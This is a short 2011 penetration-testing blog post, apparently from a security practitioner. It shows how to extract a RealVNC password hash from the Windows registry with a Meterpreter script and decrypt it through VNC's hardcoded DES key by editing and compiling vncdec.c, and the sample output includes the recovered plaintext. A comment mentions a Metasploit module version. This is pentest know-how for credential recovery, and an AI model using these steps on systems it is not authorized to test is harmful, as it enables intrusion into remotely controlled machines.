Tuesday, March 15, 2011

VNC passwords and Metasploit and DES


Inside your meterpreter shell, run getvncpw:

meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....

[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>


You're probably asking yourself what the F kind of password 3290e... is. Well, it's DES encrypted. Lucky for us, the key is hardcoded (0x238210763578887) and since VNC is open source...

Code here:
http://packetstormsecurity.org/files/view/10159/vncdec.

Change the relevant section:

/* put your password hash here in p[] */

char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};


getvncpw spat out: 3290e903b5bf3769

char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};

cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass


Or use this one:
http://www.consume.org/~jshare/vncdec.c

where you can just put your hash on the command line and don't have to recompile every time.

1 comment:

Rob Fuller (mubix) said...

I rewrote the script as a post module.

Info here:
http://www.room362.com/blog/2011/3/20/metasploit-vnc-password-extraction.html

Committed as of r12048
https://www.metasploit.com/redmine/projects/framework/repository/revisions/12048